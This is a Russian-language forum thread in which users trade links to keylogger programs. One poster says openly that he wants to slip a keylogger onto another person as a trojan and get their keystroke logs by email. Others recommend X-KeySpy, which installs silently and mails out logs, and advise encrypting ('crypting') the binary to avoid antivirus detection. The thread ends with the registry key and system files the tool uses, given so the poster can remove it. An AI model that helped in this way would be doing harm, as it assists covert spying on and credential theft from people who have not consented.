Я пользуюсь SC-KeyLog мне нравится)))

http://www.ruloads.com/utils/security/11730prog.html

Я че то не понял как его юзать то, даже не врубился где ключ вводить... а то 10 дней всего, да и руссика на него че то не нашел...

X-KeySpy v0.7
_http://freeshells.ch/~hsi/xkeyspy.zip
Очень приличный логгер. Имеет собственный smtp-сервер для отправки отчетов.
P.S. После конфигурирования желательно закриптовать тело.

http://www.actualspy.ru/
http://www.z-oleg.com/secur/articles/keylogger.php
http://worldcpp.vingrad.ru/vspp/zgrt117.php
http://content.mail.ru/pages/p_1684.html
http://www.izcity.com/lib/28042005.htm
гуглим товарищ

Про актруал спай знаю, у самого стоит.., вы меня видимо не так поняли... мне нужно впарить кейлогер челу, как трояна, а потом просто словить лог на мыло или на хост, а эти вроде не по такому принцыпу работают..
Или я ошибаюсь, поправьте если че..

Benzin
Ну вот xkeyspy по такому принципу и работает. После запуска незаметно устанавливается в системе и шлет логи на указанный при конфигурации email. Размер сжатого тела - 5 Кб.

Пасиб, я уже понял после того как установил его.., я так понимаю впаривать надо сам keylogger. Я его себе запустил, где его искать теперь и как избавиться?

Benzin
Вот это я не помню.
Проще всего тебе будет запустить AVP и удалить им, так как эта версия некриптованная и ее сигнатура есть в базе.
Либо запустить еще раз и отследить манипуляции с ФС и реестром с помощью Regshot, File Monitor

Расковырял я его.
Логгер делает следующее:
Пишет в реестр -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\svroot с параметром C:\WINDOWS\system32\svroot.exe
Пишет в системную папку два файла:
C:\WINDOWS\system32\svroot.dll
C:\WINDOWS\system32\gorsys32.dll
Чтобы избавиться от логгера достаточно удалить параметр из реестра и тело из системной папки.